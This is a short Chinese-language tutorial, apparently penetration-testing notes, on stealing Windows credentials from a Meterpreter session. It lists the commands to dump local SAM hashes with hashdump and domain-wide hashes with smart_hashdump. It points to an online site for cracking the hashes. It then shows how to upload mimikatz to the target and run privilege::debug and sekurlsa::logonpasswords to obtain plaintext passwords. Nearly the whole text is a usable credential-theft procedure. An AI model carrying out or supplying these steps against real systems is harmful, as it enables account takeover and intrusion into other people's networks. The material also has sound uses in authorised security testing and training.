run hashdump 命令#

hashdump 模块可以从 SAM数据库 中导出本地用户账号，该命令的使用需要系统权限

• 在 meterpreter_shell 中执行 run hashdump 命令

1
run hashdump

• 用户哈希数据的输出格式为

1
用户名:SID:LM哈希:NTLM哈希:::

• 使用在线网站解密hash密码 CMD5

• run windows/gather/smart_hashdump 命令

使用需要系统权限。该功能更强大 如果当前用户是域管理员用户 则可以导出域内所有用户的 hash

上传 mimikatz 程序#

我们可以通过上传 mimikatz 程序 然后执行 mimikatz 程序来获取明文密码

• 前提 执行 mimikatz 必须 System 权限 并且在执行时，要根据当前的系统位数进行选择

• 使用方法

1. 在 meterpreter_shell 的命令行里面查看当前会话的权限

1
getuid

2. 查看系统位数

1
sysinfo

3. 选择相应位数的 mimikatz 上传至目标服务器

1
upload file  #upload命令后面需要跟上要上传文件的路径；这个命令是从当前机器上传到目标机器；

4. 进入 mimikatz 的交互界面

1
execute -i -f mimikatz.exe

5. 在 mimikatz 交互界面，使用以下两条命令抓取密码

1
privilege::debug
2
sekurlsa::logonpasswords